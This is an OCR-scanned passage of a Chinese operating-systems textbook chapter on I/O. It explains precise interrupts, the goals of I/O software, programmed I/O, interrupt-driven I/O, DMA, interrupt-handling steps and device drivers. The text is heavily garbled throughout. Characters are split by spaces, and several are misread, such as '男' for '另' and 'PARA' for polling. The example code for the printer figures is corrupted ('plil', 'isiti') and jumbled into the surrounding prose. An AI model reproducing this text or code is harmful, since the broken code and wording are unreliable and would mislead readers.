将 机 器 留 在 一 个 明确 状态 的 中 断 称 为 精确 中 断 (precise interrupt; Walker 和 Cragon，1995)。 精 确 
中 断 具 有 4 个 特性 : 

1) PC (程序 计数 器 ) 保存 在 一 个 已 知 的 地 方 。 

2) PC 所 指向 的 指令 之 前 的 所 有 指令 已 经 完全 执行 。 

3) PC 所 指向 的 指令 之 后 的 所 有 指令 都 没有 执行 。 

4) PC 所 指向 的 指令 的 执行 状态 是 已 知 的 。 

注意 ， 对 于 PC 所 指向 的 指令 之 后 的 那些 指令 来 说 ， 此 处 并 没有 禁止 它们 开始 执行 ， 而 只 是 要 求 在 
中 断 发 生 之 前 必须 撤销 它们 对 寄存 器 或 内 存 所 
做 的 任何 修改 。PC 所 指向 的 指令 有 可 能 已 经 执 
行 了 ， 也 有 可 能 还 没有 执行 ， 然 而 ， 必 须 清楚 
适用 的 是 哪 种 情况 。 通 常 ， 如 果 中 断 是 一 个 IO 
中 断 ， 那 么 指令 就 会 还 没有 开始 执行 。 然 而 ， 
如 果 中 断 实际 上 是 一 个 陷阱 或 者 页 面 故 障 ， 那 
么 PC 一 般 指向 导致 错误 的 指令 ， 所 以 它 以 后 可 
以 重新 开始 执行 。 图 5-6a 所 示 的 情形 描述 了 精 
确 中 断 。 程 序 计 数 器 (316) 之 前 的 所 有 指令 都 已 经 完成 了 ， 而 它 之 后 的 指令 都 还 没有 启动 (或 者 已 经 
回 退 以 撤销 它们 的 作用 )。 

不 满足 这 些 要 求 的 中 断 称 为 不 精确 中 断 (imprecise interrupt)， 不 精确 中 断 使 操作 系统 编写 者 过 得 
极为 不 愉快 ， 现 在 操作 系统 编写 者 必须 断定 已 经 发 生 了 什么 以 及 还 要 发 生 什 么 。 图 5-6b 描 述 了 不 精确 中 
断 ， 其 中 邻近 程序 计数 器 的 不 同 指令 处 于 不 同 的 完成 状态 ， 老 的 指令 不 一 定 比 新 的 指令 完成 得 更 多 。 具 
有 不 精确 中 断 的 机 器 通常 将 大 量 的 内 部 状态 “吐出 ”到 堆栈 中 ， 从 而 使 操作 系统 有 可 能 判断 出 正在 发 生 
什么 事情 。 重 新 启动 机 器 所 必需 的 代码 通常 极其 复杂 。 此 外 ， 在 每 次 中 断 发生 时 将 大 量 的 信息 保存 在 内 
存 中 使 得 中 断 响应 十 分 缓慢 ， 而 恢复 则 更 加 糟糕 。 这 就 导致 具有 讽刺 意味 的 情形 : 由 于 缓慢 的 中 断 使 得 
非常 快速 的 超标 量 CPU 有 时 并 不 适合 实时 工作 。 

有 些 计 算 机 设计 成 某 些 种 类 的 中 断 和 陷阱 是 精确 的 ， 而 其 他 的 不 是 。 例 如 ， 可 以 让 IO 中 断 是 精确 
的 ， 而 归 因 于 致命 编程 错误 的 陷阱 是 不 精确 的 ， 由 于 在 被 0 除 之 后 不 需要 尝试 重新 开始 运行 的 进程 ， 所 
以 这 样 做 也 不 错 。 有 些 计算 机 具有 一 个 位 ， 可 以 设置 它 强迫 所 有 的 中 断 都 是 精确 的 。 设 置 这 一 位 的 不 利 
之 处 是 ， 它 强迫 CPU 仔细 地 将 正在 做 的 一 切 事情 记 入 日 志 并 且 维 护 寄 存 器 的 影子 副本 ， 这 样 才能 够 在 任 
意 时 刻 生成 精确 中 断 。 所 有 这 些 开销 都 对 性 能 具有 较 大 的 影响 。 

某 些 超标 量 计算 机 (例如 x86 系 列 ) 具有 精确 中 断 ， 从 而 使 老 的 软件 正确 工作 。 为 与 精确 中 断 保持 
后 向 兼容 付出 的 代价 是 CPU 内 部 极其 复杂 的 中 断 逻 辑 ， 以 便 确保 当中 断 控制 器 发 出 信号 想 要 导致 一 个 中 
断 时 , 允许 直到 某 一 点 之 前 的 所 有 指令 完成 而 不 允许 这 一 点 之 后 的 指令 对 机 器 状态 产生 任何 重要 的 影响 。 
此 处 付出 的 代价 不 是 在 时 间 上 ， 而 是 在 芯片 面积 和 设计 复杂 性 上 。 如 果 不 是 因为 向 后 兼容 的 目的 而 要 求 
精确 中 断 的 话 ， 这 一 芯片 面积 就 可 以 用 于 更 大 的 片上 高 速 缓存 ， 从 而 使 CPU 的 速度 更 快 。 另 一 方面 ， 不 
精确 中 断 使 得 操作 系统 更 为 复杂 而 且 运 行 得 更 加 缓慢 ， 所 以 断定 哪 一 种 方法 更 好 是 十 分 困难 的 。 


5.2 IO 软件 原理 


在 讨论 了 IO 硬件 之 后 ， 下 面 我 们 来 看 一 看 IO 软件 。 首 先 我 们 将 看 一 看 IO 软件 的 目标 ， 然 后 从 操作 
系统 的 观点 来 看 一 看 IO 实现 的 不 同方 法 。 


5.2.1 IO 软件 的 目标 

在 设计 IO 软件 时 一 个 关键 的 概念 是 设备 独立 性 (device independence) 。 它 的 意思 是 应 该 能 够 编写 
出 这 样 的 程序 : 它 可 以 访问 任意 IO 设备 而 无 需 事先 指定 设备 。 例 如 ， 读 取 一 个 文件 作为 输入 的 程序 应 
该 能 够 在 硬盘 、DVD 或 者 USB 盘 上 读 取 文 件 , 无需 为 每 一 种 不 同 的 设备 修改 程序 。 类 似 地 ， 用 户 应 该 能 
够 键入 这 样 一 条 命令 


sort <input> output 


图 5-6 a 
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并 且 无 论 输 入 来 自任 意 类 型 的 存储 盘 或 者 键盘 ， 输 出 送 往 任 意 类 型 的 存储 盘 或 者 屏幕 ， 上 述 命令 都 可 以 
工作 。 尽 管 这 些 设备 实际 上 差别 很 大 ， 需 要 非常 不 同 的 命令 序列 来 读 或 写 ， 但 这 一 事实 所 带 来 的 问题 将 
由 操作 系统 负责 处 理 。 

与 设备 独立 性 密切 相关 的 是 统一 命名 (uniform naming) 这 一 目标 。 一 个 文件 或 一 个 设备 的 名 字 应 
该 是 一 个 简单 的 字符 串 或 一 个 整数 ， 它 不 应 依赖 于 设备 。 在 UNIX 系 统 中 ， 所 有 存储 盘 都 能 以 任意 方式 
集成 到 文件 系统 层次 结构 中 ， 因 此 ， 用 户 不 必 知 道 哪个 名 字 对 应 于 哪 台 设 备 。 例 如 ， 一 个 USB 盘 可 以 安 
装 (mount) 到 目录 /usr/ast/backup 下 ， 这 样 复制 一 个 文件 到 /usr/ast/backup/monday 就 是 将 文件 复制 到 
USB 盘 上 。 用 这 种 方法 ， 所 有 文件 和 设备 都 采用 相同 的 方式 一 一 路 径 名 进行 寻 址 。 

IO 软件 的 另 一 个 重要 问题 是 错误 处 理 (error handling)。 一 般 来 说 ， 错 误 应 该 尽 可 能 地 在 接近 硬件 
的 层面 得 到 处 理 。 当 控制 器 发 现 了 一 个 读 错误 时 ， 如 果 它 能 够 处 理 那 么 就 应 该 自己 设法 纠正 这 一 错误 。 
如 果 控 制 器 处 理 不 了 ， 那 么 设备 驱动 程序 应 当 了 予以 处 理 ， 可 能 只 需 重读 一 次 这 块 数据 就 正确 了 。 很 多 错 
误 是 偶然 性 的 ， 例 如 ， 磁 盘 读 写 头 上 的 灰尘 导致 读 写 错 误 时 ， 重 复 该 操作 ， 错 误 经 常 就 会 消失 。 只 有 在 
低层 软件 处 理 不 了 的 情况 下 ， 才 将 错误 上 交 高 层 处 理 。 在 许多 情况 下 ， 错 误 恢复 可 以 在 低层 透明 地 得 到 
解决 ， 而 高 层 软件 甚至 不 知道 存在 这 一 错误 。 

另 一 个 关键 问题 是 同步 (synchronous， 即 阻塞 ) 和 异步 (asynchronous， 即 中 断 驱 动 ) 传输 。 大 多 
数 物 理 IO 是 异步 的 一 一 CPU 启动 传输 后 便 转 去 做 其 他 工作 ， 直 到 中 断 发 生 。 如 果 IO 操 作 是 阻塞 的 ， 那 
么 用 户 程序 就 更 加 容易 编写 一 一 在 read 系 统 调用 之 后 , 程序 将 自动 被 挂 起 ,直到 缓冲 区 中 的 数据 准备 好 。 
正 是 操作 系统 使 实际 上 是 中 断 驱动 的 操作 变 为 在 用 户 程 序 看 来 是 阻塞 式 的 操作 。 然 而 ， 茶 些 性 能 极 高 的 
应 用 程序 需要 控制 1O 的 所 有 细节 ， 所 以 某 些 操作 系统 使 异步 1O 对 这 样 的 应 用 程序 是 可 用 的 。 

IO 软件 的 另 一 个 问题 是 缓冲 (buffering)。 数 据 离开 一 个 设备 之 后 通常 并 不 能 直接 存放 到 其 最 终 的 
目的 地 。 例 如 ， 从 网 络 上 进来 一 个 数据 包 时 ， 直 到 将 该 数据 包 存 放 在 某 个 地 方 并 对 其 进行 检查 ， 操 作 系 
统 才 知道 要 将 其 置 于 何 处 。 此 外 ， 某 些 设备 具有 严格 的 实时 约束 (例如 ， 数 字音 频 设备 )， 所 以 数据 必 
须 预 先 放 置 到 输出 缓冲 区 之 中 ， 从 而 消除 缓冲 区 填 满 速率 和 缓冲 区 清空 速率 之 间 的 相互 影响 ， 以 避免 缓 
冲 区 欠 载 。 缓 冲 涉及 大 量 的 复制 工作 ， 并 且 经 常 对 1/O 性 能 有 重大 影响 。 

此 处 我 们 将 提 到 的 最 后 一 个 概念 是 共享 设备 和 独占 设备 的 问题 。 有 些 I/O 设 备 (如 磁盘 ) 能 够 同时 
让 多 个 用 户 使 用 。 多 个 用 户 同 时 在 同一 磁盘 上 打开 文件 不 会 引起 什么 问题 。 其 他 设备 〈 如 磁带 机 ) 则 必 
须 由 单个 用 户 独 占 使 用 ， 直 到 该 用 户 使 用 完 ， 另 一 个 用 户 才能 拥有 该 磁带 机 。 让 两 个 或 更 多 的 用 户 随机 
地 将 交叉 混杂 的 数据 块 写 和 人 相同 的 磁带 是 注定 不 能 工作 的 。 独 占 ( 非 共享 ) 设备 的 引入 也 带 来 了 各 种 各 
样 的 问题 ， 如 死 锁 。 同 样 ， 操 作 系 统 必须 能 够 处 理 共 享 设备 和 独占 设备 以 避免 问题 发 生 。 


5.2.2 程序 控制 MO 

I/O 可 以 采用 三 种 根本 上 不 同 的 方式 来 实现 。 在 本 小 节 中 我 们 将 介绍 第 一 种 (程序 控制 1O)， 在 后 
面 两 小 节 中 我 们 将 研究 另外 两 种 〈 中 断 驱动 JO 和 使 用 DMA 的 IO)。IO 的 最 简单 形式 是 让 CPU 做 全 部 工 
作 ， 这 一 方法 称 为 程序 控制 IO (programmed IO ) 。 

借助 于 例子 来 说 明 程 序 控制 IO 是 最 简单 的 。 考 虑 一 个 用 户 进程 ， 该 进程 想 通 过 串 行 接口 在 打印 机 
上 打印 8 个 字符 的 字符 串 “ABCDEFGH”。 在 某 些 贱 入 式 系统 上 显示 有 时 就 是 这 样 工作 的 。 软 件 首先 要 
在 用 户 空间 的 一 个 缓冲 区 中 组 装 字符 串 ， 如 图 5-7a 所 示 。 

然后 ， 用 户 进程 通过 发 出 打开 打印 机 一 类 的 系统 调用 来 获得 打印 机 以 便 进行 写 操作 。 如 果 打 印 机 当前 被 
另 一 个 进程 占用 ， 该 系统 调用 将 失败 并 返回 一 个 错误 代码 ,或 者 将 阻塞 直到 打印 机 可 用 ， 具 体 情况 取决 于 操 
作 系统 和 调用 参数 。 一 旦 拥有 打印 机 ， 用 户 进程 就 发 出 一 个 系统 调用 通知 操作 系统 在 打印 机 上 打印 字符 串 。 

然后 ， 操 作 系统 (通常 ) 将 字符 串 缓冲 区 复制 到 内 核 空间 中 的 一 个 数组 (如 p) 中 ， 在 这 里 访问 更 
加 容易 (因为 内 核 可 能 必须 修改 内 存 映 射 才能 到 达 用 户 空间 )。 然 后 操作 系统 要 查看 打印 机 当前 是 否 可 
用 。 如 果 不 可 用 ， 就 要 等 待 直到 它 可 用 。 一 旦 打印 机 可 用 ， 操 作 系 统 就 复制 第 一 个 字符 到 打印 机 的 数据 
寄存 器 中 ， 在 这 个 例子 中 使 用 了 内 存 映射 1O。 这 一 操作 将 激活 打印 机 。 字 符 也 许 还 不 会 出 现在 打印 机 
上 ， 因 为 某 些 打印 机 在 打印 任何 东西 之 前 要 人 先 缓冲 一 行 或 一 页 。 然 而 ， 在 图 5-7b 中 ， 我 们 看 到 第 一 个 字 
符 已 经 打印 出 来 ， 并 且 系统 已 经 将 “B” 标 记 为 下 一 个 待 打印 的 字符 。 
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图 5-7 打印 一 个 字符 串 的 步骤 


一 旦 将 第 一 个 字符 复制 到 打印 机 ， 操 作 系 统 就 要 查看 打印 机 是 否 就 绪 准 备 接收 男 一 个 字符 。 一 般 而 
， 打 印 机 都 有 第 二 个 寄存 器 ， 用 于 表明 其 状态 。 将 字符 写 到 数据 寄存 器 的 操作 将 导致 状态 变 为 非 就 绪 。 
当 打 印 机 控制 器 处 理 完 当 前 字符 时 ， 它 就 通过 在 其 状态 寄存 器 中 设置 某 一 位 或 者 将 某 个 值 放 到 状态 寄存 
器 中 来 表示 其 可 用 性 。 

这 时 ， 操 作 系统 将 等 待 打 印 机 状态 再 次 变 为 就 绪 。 打 印 机 就 绪 事件 发 生 时 ， 操 作 系 统 就 打印 下 一 个 
字符 ， 如 图 $-7c 所 示 。 这 一 循环 继续 进行 ， 直 到 整个 字符 串 打印 完 。 然 后 ， 控 制 返回 到 用 户 进程 。 
操作 系统 相继 采取 的 操作 简要 地 总 结 在 图 5-8 中 。 首 先 ， 数 据 被 复制 到 内 核 空 间 。 然 后 ， 操 作 系统 
进入 一 个 密闭 的 循环 ， 一 次 输出 一 个 字符 。 在 该 图 中 ， 清 楚 地 说 明了 程序 控制 IO 的 最 根本 的 方面 ， 这 
就 是 输出 一 个 字符 之 后 ，CPU 要 不 断 地 查询 设备 以 了 解 它 是 否 就 绪 准 备 接收 男 一 个 字符 。 这 一 行为 经 常 
PARA (polling) 或 忙 等 待 (busy waiting) 。 
copy_from_user(buffer, p, count); /* p 是 内 核 缓 冲 区 */ 
for (i = 0; i < count; i++) { /* 对 每 个 字符 循环 */ 


while (*printer_status_reg != READY); /* 循环 直到 就 绪 */ 
*printer_data_register = plil; 人 # 输出 一 个 字符 */ 


mp 





} 
return_to_user( ); 


图 5-8 使 用 程序 控制 IO 将 一 个 字符 串 写 到 打印 机 


程序 控制 IO 十 分 简单 但 是 有 缺点 ， 即 直到 全 部 MO 完成 之 前 要 占用 CPU 的 全 部 时 间 。 如 果 “ 打 印 ” 
一 个 字符 的 时 间 非 常 短 (因为 打印 机 所 做 的 全 部 事情 就 是 将 新 的 字符 复制 到 一 个 内 部 缓冲 区 中 )， 那 么 
忙 等 待 还 是 不 错 的 。 此 外 ， 在 嵌入 式 系统 中 ，CPU 没 有 其 他 事情 要 做 ， 忙 等 待 也 是 合理 的 。 然 而 ， 在 更 
加 复杂 的 系统 中 ，CPU 有 其 他 工作 要 做 ， 忙 等 待 将 是 低 效 的 ， 需 要 更 好 的 IO 方法 。 


5.2.3 中 断 驱动 JO 

现在 我 们 考虑 在 不 缓冲 字符 而 是 在 每 个 字符 到 来 时 便 打印 的 打印 机 上 进行 打印 的 情形 。 如 果 打印 机 
每 秒 可 以 打印 100 个 字符 ， 那 么 打印 每 个 字符 将 花费 10ms。 这 意味 着 ， 当 每 个 字符 写 到 打印 机 的 数据 寄 
存 器 中 之 后 ，CPU 将 有 10ms 搁 置 在 无 价值 的 循环 中 ， 等 待 允许 输出 下 一 个 字符 。 这 10ms 时 间 足 以 进行 
一 次 上 下 文 切换 并 且 运 行 其 他 进程 ， 否 则 就 浪费 了 。 

这 种 允许 CPU 在 等 待 打 印 机 变 为 就 绪 的 同时 做 某 些 其 他 事情 的 方式 就 是 使 用 中 断 。 当 打印 字符 串 的 
系统 调用 被 发 出 时 ， 如 我 们 前 面 所 介绍 的 ， 字 符 串 缓冲 区 被 复制 到 内 核 空间 ， 并 且 一 旦 打印 机 准备 好 接 
收 一 个 字符 时 就 将 第 一 个 字符 复制 到 打印 机 中 。 这 时 ，CPU 要 调用 调度 程序 ， 并 且 某 个 其 他 进程 将 运行 。 
请 求 打 印字 符 串 的 进程 将 被 阻塞 ， 直 到 整个 字符 串 打印 完 。 系 统 调用 所 做 的 工作 如 图 5-9a 所 示 。 

当 打印 机 将 字符 打印 完 并 且 准 备 好 接收 下 一 个 字符 时 ， 它 将 产生 一 个 中 断 。 这 一 中 断 将 停止 当前 进 
程 并 且 保存 其 状态 。 然 后 ， 打 印 机 中 断 服务 过 程 将 运行 。 图 5-9b 所 示 为 打印 机 中 断 服 务 过 程 的 一 个 粗略 
的 版 本 。 如 果 没 有 更 多 的 字符 要 打印 ， 中 断 处 理 程序 将 采取 某 个 操作 将 用 户 进程 解除 阻塞 。 否则 ， 它 将 
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输出 下 一 个 字符 ， 应 答 中 断 ， 并 且 返 回 到 中 断 之 前 正在 运行 的 进程 ， 该 进程 将 从 其 停止 的 地 方 继续 运行 。 


copy_from_user(buffer, p, count); 
enable_interrupts( ); 
while (*printer_status_reg != READY) ; 


if (count == 0) { 

unblock _user( ); 
} else { A 
*printer_data_register = p[i]; 
count = count — 1; 


*printer_data_register = p[0]; 
scheduler( ); 
isiti 


acknowledge_interrupt( ); 
return_from_interrupt( ); 








a) b) 
图 5-9 使 用 中 断 驱 动 O 将 一 个 字符 串 写 到 打印 机 : a) 当 打印 系统 调用 被 发 出 时 执行 的 代码 ， 
b) 打印 机 的 中 断 服务 过 程 


5.2.4 使 用 DMA 的 I/O ， 
中 断 驱动 IO 的 一 个 明显 缺点 是 中 断 发 生 在 每 个 字符 上 。 中 断 要 花费 时 间 ， 所 以 这 一 方法 将 浪费 一 

定数 量 的 CPU 时 间 。 这 一 问题 的 一 种 解决 方法 是 使 用 DMA。 此 处 的 思路 是 让 DMA 控 制 器 一 次 给 打印 机 

提供 一 个 字符 , 而 不 必 打 扰 CPU。 本 质 上 ， copy_from_user(buffer, p, count); 

DMA 是 程序 控制 IO， 只 是 由 DMA 控 制 器 set_up_DMA_controller( ); 

而 不 是 主 CPU 做 全 部 工作 。 这 一 策略 需要 。 |_Scheduler(): 

特殊 的 硬件 (DMA 控 制 器 ) ， 但 是 使 CPU a} 


获得 自由 从 而 可 以 在 IO 期 间 做 其 他 工作 。 ”图 5-10 使 用 DMA 打 印 一 个 字符 串 ，a) 当 打印 系统 调用 被 


使 用 DMA 的 代码 概要 如 图 5-10 所 示 。 ma k 
r 5 3b z 
DMA 重 大 的 成 功 是 将 中 断 的 次 数 从 发 出 时 执行 的 代码 ，b) 中 断 服务 过 程 


打印 每 个 字符 一 次 减少 到 打印 每 个 缓冲 区 一 次 。 如 果 有 许多 字符 并 且 中 断 十 分 缓慢 ， 那 么 采用 DMA 可 
能 是 重要 的 改进 。 另 一 方面 ， DMA 控 制 器 通常 比 主 CPU 要 慢 很 多 。 如 果 DMA 控 制 器 不 能 以 全 速 驱动 设 
备 ， 或 者 CPU 在 等 待 DMA 中 断 的 同时 没有 其 他 事情 要 做 ， 那 么 采用 中 断 驱 动 O 甚 至 采用 程序 控制 1O 也 
许 更 好 。 


5.3 ”1/O 软 件 层 次 
1/0 软 件 通常 组 织 成 四 个 层次 ， 如 图 5-11 所 示 。 每 一 层 具 有 一 个 要 执行 的 定义 明确 的 功能 和 一 个 的 


定义 明确 的 与 邻近 层次 的 接口 。 功 能 与 接 
吕 随 系统 的 不 同 而 不 同 ， 所 以 下 面 的 讨论 
并 不 针对 一 种 特定 的 机 器 。 我 们 将 从 底层 
开始 讨论 每 一 层 。 
5.3.1 中 断 处 理 程序 

虽然 程序 控制 IO 偶 尔 是 有 益 的 ， 但 是 硬件 
对 于 大 多 数 IO 而 言 ， 中 断 是 令 人 不 愉快 的 
事情 并 且 无 法 避免 。 应 当 将 其 深 深 地 隐藏 : 
在 操作 系统 内 部 ， 以 便 系 统 的 其 他 部 分 尽量 不 与 它 发 生 联 系 。 隐 藏 它们 的 最 好 办 法 是 将 启动 一 个 IO 操 
作 的 驱动 程序 阻塞 起 来 ， 直 到 IO 操作 完成 并 且 产 生 一 个 中 断 。 驱 动 程序 可 以 阻塞 自己 ， 例 如 ， 在 一 个 
信号 量 上 执行 down 操 作 、 在 一 个 条 件 变 量 上 执行 wait 操 作 、 在 一 个 消息 上 执行 receive 操 作 或 者 某 些 类 
似 的 操作 。 

当中 断 发 生 时 ， 中 断 处 理 程序 将 做 它 必 须要 做 的 全 部 工作 以 便 对 中 断 进 行 处 理 。 然 后 ， 它 可 以 将 启 
动 中 断 的 驱动 程序 解除 阻塞 。 在 一 些 情形 中 ， 它 只 是 在 一 个 信号 量 上 执行 up 操作 ， 其 他 情形 中 ， 是 对 管 
程 中 的 条 件 变 量 执 行 signal 操 作 ， 还 有 一 些 情形 中 ， 是 向 被 阻塞 的 驱动 程序 发 一 个 消息 。 在 所 有 这 些 情 
形 中 ， 中 断 最 终 的 结果 是 使 先前 被 阻塞 的 驱动 程序 现在 能 够 继续 运行 。 如 果 驱 动 程序 构造 为 内 核 进程 ， 















图 5-11 IO 软件 系统 的 层次 
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具有 它们 自己 的 状态 、 堆 栈 和 程序 计数 器 ， 那 么 这 一 模型 运转 得 最 好 。 

当然 ， 现 实 没 有 如 此 简单 。 对 一 个 中 断 进行 处 理 并 不 只 是 简单 地 捕获 中 断 ， 在 某 个 信号 量 上 执行 
up 操作 ， 然 后 执行 一 条 IRET 指 令 从 中 断 返回 到 先前 的 进程 。 对 操作 系统 而 言 ， 还 涉及 更 多 的 工作 。 我 
们 将 按 一 系列 步骤 给 出 这 一 工作 的 轮廓 ， 这 些 步骤 是 硬件 中 断 完成 之 后 必须 在 软件 中 执行 的 。 应 该 注意 
的 是 ， 细 节 是 非常 依赖 于 系统 的 ， 所 以 下 面 列 出 的 某 些 步骤 在 一 个 特定 的 机 器 上 可 能 是 不 必要 的 ， 而 没 
有 列 出 的 步骤 可 能 是 必需 的 。 此 外 ， 确 实 发 生 的 步骤 在 某 些 机 器 上 也 可 能 有 不 同 的 顺序 。 

1) 保存 没有 被 中 断 硬件 保存 的 所 有 寄存 器 (包括 PSW ) 。 

2) 为 中 断 服务 过 程 设置 上 下 文 ， 可 能 包括 设置 TLB、MMU 和 页 表 。 

3) 为 中 断 服务 过 程 设置 堆栈 。 

4) 应 答 中 断 控制 器 ， 如 果 不 存在 集中 的 中 断 控制 器 ， 则 再 次 开放 中 断 。 

5) 将 寄存 器 从 它们 被 保存 的 地 方 ( 可 能 是 某 个 堆栈 ) 复制 到 进程 表 中 。 

6) 运行 中 断 服务 过 程 ， 从 发 出 中 断 的 设备 控制 器 的 寄存 器 中 提取 信息 。 

7) 选择 下 一 次 运行 哪个 进程 ， 如 果 中 断 导 致 某 个 被 阻塞 的 高 优先 级 进程 变 为 就 绪 ， 则 可 能 选择 它 现 
在 就 运行 。 

8) 为 下 一 次 要 运行 的 进程 设置 MMU 上 下 文 ， 也 许 还 需要 设置 某 个 TLB。 

9) 装 入 新 进程 的 寄存 器 ， 包 括 其 PSW 。 

10) 开始 运行 新 进程 。 

由 此 可 见 ， 中 断 处 理 远 不 是 无 足 轻重 的 小 事 。 它 要 花费 相当 多 的 CPU 指令 ， 特 别 是 在 存在 虚拟 内 存 
并 且 必 须 设置 页 表 或 者 必须 保存 MMU 状 态 (例如 R 和 M 位 ) 的 机 器 上 。 在 某 些 机 器 上 ， 当 在 用 户 态 与 核 
心态 之 间 切 换 时 ， 可 能 还 需要 管理 TLB 和 CPU 高 速 缓存 ， 这 就 要 花费 额外 的 机 器 周期 。 


5.3.2 设备 驱动 程序 

在 本 章 前 面 的 内 容 中 ， 我 们 介绍 了 设备 控制 器 所 做 的 工作 。 我 们 注意 到 每 一 个 控制 器 都 设 有 某 些 设 
备 寄 存 器 用 来 向 设备 发 出 命令 ， 或 者 设 有 某 些 设备 寄存 器 用 来 读 出 设备 的 状态 ， 或 者 设 有 这 两 种 设备 寄 
存 器 。 设 备 寄存 器 的 数量 和 命令 的 性 质 在 不 同 设备 之 间 有 着 根本 性 的 不 同 。 例 如 ， 鼠 标 驱 动 程序 必须 从 
鼠标 接收 信息 ， 以 识别 鼠标 移动 了 多 远 的 距离 以 及 当前 哪 一 个 键 被 按 下 。 相 反 ， 磁 盘 驱 动 程序 可 能 必须 
要 了 解 遍 区、 磁道、 柱 面 、 磁 头 、 磁 盘 辟 移动、 电机 驱动 器 、 磁 头 定位 时 间 以 及 所 有 其 他 保证 磁盘 正常 
工作 的 机 制 。 显 然 ， 这 些 驱 动 程序 是 有 很 大 区 别 的 。 

因此 ， 每 个 连接 到 计算 机 上 的 IO 设备 都 需要 某 些 设备 特定 的 代码 来 对 其 进行 控制 。 这 样 的 代码 称 
为 设备 驱动 程序 (device driver) ， 它 一 般 由 设备 的 制造 商 编写 并 随同 设备 一 起 交付 。 因 为 每 一 个 操作 系 
统 都 需要 自己 的 驱动 程序 ， 所 以 设备 制造 商 通常 要 为 若干 流行 的 操作 系统 提供 驱动 程序 。 

每 个 设备 驱动 程序 通常 处 理 一 种 类 型 的 设备 ， 或 者 至 多 处 理 一 类 紧密 相关 的 设备 。 例 如 ，SCSI 磁 
盘 驱 动 程序 通常 可 以 处 理 不 同 大 小 和 不 同 速度 的 多 个 SCSI 磁 盘 ， 或 许 还 可 以 处 理 SCSI 蓝 光 光 盘 。 而 另 
一 方面 ， 鼠 标 和 游戏 操纵 杆 是 如 此 的 不 同 ， 以 至 于 它们 通常 需要 不 同 的 驱动 程序 。 然 而 ， 对 于 一 个 设备 
驱动 程序 控制 多 个 不 相关 的 设备 并 不 存在 技术 上 的 限制 ， 只 是 这 样 做 并 不 是 一 个 好 主意 。 

不 过 在 有 些 时 候 ， 极 其 不 同 的 设备 却 基于 相同 的 底层 技术 。 众 所 周知 的 例子 可 能 是 USB ， 这 是 一 种 
串 行 总 线 技术 ， 称 其 为 “通用 ”并 不 是 无 缘 无 故 的 。USB 设 备 包括 磁盘 、 记 忆 棒 、 照 相机 、 鼠 标 、 键 盘 、 
微型 风扇 、 无 线 网 卡 、 机 器 人 、 信 用 卡 读 卡 器 、 可 充电 剃 须 刀 、 碎 纸 机 、 条 形 码 扫描 仪 、 迪 斯 科 球 以 及 
便携 式 温度 计 。 它 们 都 使 用 USB ， 但 是 它们 做 着 非常 不 同 的 事情 。 此 处 的 技巧 是 USB 驱 动 程序 通常 是 堆 
栈 式 的 ， 就 像 是 网 络 中 的 TCP/IP 栈 。 在 底层 ， 特 别 是 在 硬件 中 ， 我 们 会 发 现 USB 链 路 层 (HFTI/O), ix 
一 层 处 理 硬件 事物 ， 例 如 发 信号 以 及 将 信号 流 译 码 成 USB 包 。 这 一 层 被 较 高 的 层次 所 使 用 ， 而 这 些 较 高 
的 层次 则 处 理 数据 包 以 及 被 大 多 数 设备 所 共享 的 USB 通 用 功能 。 最 后 ， 在 顶层 我 们 会 发 现 高 层 API， 例 
如 针对 大 容量 存储 设备 和 照相 机 等 的 接口 。 因 此 ， 我 们 依然 拥有 分 开 的 设备 驱动 程序 ， 尽 管 它们 共享 部 
分 协议 栈 。 

为 了 访问 设备 的 硬件 (意味 着 访问 设备 控制 器 的 寄存 器 ) ， 设 备 驱动 程序 通常 必须 是 操作 系统 内 核 
的 一 部 分 ， 至 少 对 目前 的 体系 结构 是 如 此 。 实 际 上 ， 有 可 能 构造 运行 在 用 户 空间 的 驱动 程序 ， 使 用 系统 
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调用 来 读 写 设备 寄存 器 。 这 一 设计 使 内 核 与 驱动 程序 相隔 离 ， 并 且 使 驱动 程序 之 间 相 互 隔 离 ， 这 样 做 可 


以 消除 系统 崩溃 的 一 个 主要 源头 一 一 有 问 
题 的 驱动 程序 以 这 样 或 那样 的 方式 干扰 内 
核 。 对 于 建立 高 度 可 靠 的 系统 而 言 ， 这 绝 
对 是 正确 的 方向 。MINIX 3 (www. 
minix3.org) 就 是 一 个 这 样 的 系统 ， 其 中 
设备 驱动 程序 就 作为 用 户 进程 而 运行 。 然 
而 ， 因 为 大 多 数 其 他 桌面 操作 系统 要 求 驱 
动 程序 运行 在 内 核 中 ， 所 以 我 们 在 这 里 只 
考虑 这 样 的 模型 。 

因为 操作 系统 的 设计 者 知道 由 外 人 
编写 的 驱动 程序 代码 片断 将 被 安装 在 操 
作 系 统 的 内 部 ， 所 以 需要 有 一 个 体系 结 
构 来 允许 这 样 的 安装 。 这 意味 着 要 有 一 
个 定义 明确 的 模型 ， 规 定 驱 动 程序 做 什 
么 事情 以 及 如 何 与 操作 系统 的 其 余部 分 
相互 作用 。 设 备 驱动 程序 通常 位 于 操作 
系统 其 余部 分 的 下 面 ， 如 图 5-12 所 示 。 

操作 系统 通常 将 驱动 程序 归 类 于 少 
数 的 类 别 之 一 。 最 为 通用 的 类 别 是 块 设备 
(block device) 和 字符 设备 (character 
device), Rik 〈 例 如 磁盘 ) 包含 多 个 
可 以 独立 寻 址 的 数据 块 ， 字 符 设 备 〈 例 如 


用 户 进程 
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图 5-12 设备 驱动 程序 的 逻辑 定位 。 实 际 上 ， 驱 动 程序 和 设 
备 控制 器 之 间 的 所 有 通信 都 通过 总 线 


键盘 和 打印 机 ) 则 生成 或 接收 字符 流 。 

大 多 数 操作 系统 都 定义 了 一 个 所 有 块 设备 都 必须 支持 的 标准 接口 ， 并 且 还 定义 了 另 一 个 所 有 字符 设 
备 都 必须 支持 的 标准 接口 。 这 些 接口 由 许多 过 程 组 成 ， 操 作 系 统 的 其 余部 分 可 以 调用 它们 让 驱动 程序 工 
作 。 典 型 的 过 程 是 那些 读 一 个 数据 块 (对 块 设备 而 言 ) 或 者 写 一 个 字符 串 〈 对 字符 设备 而 言 ) 的 过 程 。 

在 某 些 系统 中 ， 操 作 系统 是 一 个 二 进 制程 序 ， 包 含 需要 编译 到 其 内 部 的 所 有 驱动 程序 。 这 一 方案 多 
年 以 来 对 UNIX 系 统 而 言 是 标准 规范 ， 因 为 UNIX 系 统 主要 由 计算 中 心 运行 ， IO 设备 几乎 不 发 生变 化 。 
如 果 添 加 了 一 个 新 设备 ， 系 统管 理 员 只 需 重新 编译 内 核 ， 将 新 的 驱动 程序 增加 到 新 的 二 进 制程 序 中 。 

